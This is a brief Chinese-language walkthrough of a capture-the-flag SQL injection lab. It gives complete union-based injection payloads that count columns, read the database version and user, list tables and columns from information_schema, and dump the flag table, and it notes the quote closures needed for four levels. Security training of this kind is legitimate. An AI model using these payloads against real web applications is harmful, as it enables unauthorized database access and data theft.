封神台sql注入實戰靶場
通過注入找到數據庫中的Flag吧,Flag格式zKaQ-XXXXXXXX
基礎靶場1
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1
數字型注入
判斷字段個數
?id=2 order by 1
?id=2 order by 2
?id=2 order by 3
?id=2 order by 4 報錯
得出結論字段個數為3
判斷數據在頁面的顯示位置
?id=2 and 1=2 union select 1,2,3
判斷數據庫類型和版本
?id=2 and 1=2 union select 1,@@datadir,version()
獲取當前庫名和用戶
?id=2 and 1=2 union select 1,database(),user()
獲取庫下面所有的表名
?id=1 and 1=2 union select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() --+
獲取表下面的所有字段名
?id=1 and 1=2 union select 1,group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name='error_flag' --+
獲取值
?id=1 and 1=2 union select 1,group_concat(flag),2 from error.error_flag --+
一下子全爆出來了,盲猜這是前四關的flag,經過驗證果然是,前四關只是sql語句的閉合方式不同而已,都可
以用聯合注入獲取flag
閉合方式
基礎靶場1 數字型,不需要閉合基礎靶場2 '基礎靶場3 ')基礎靶場4 ")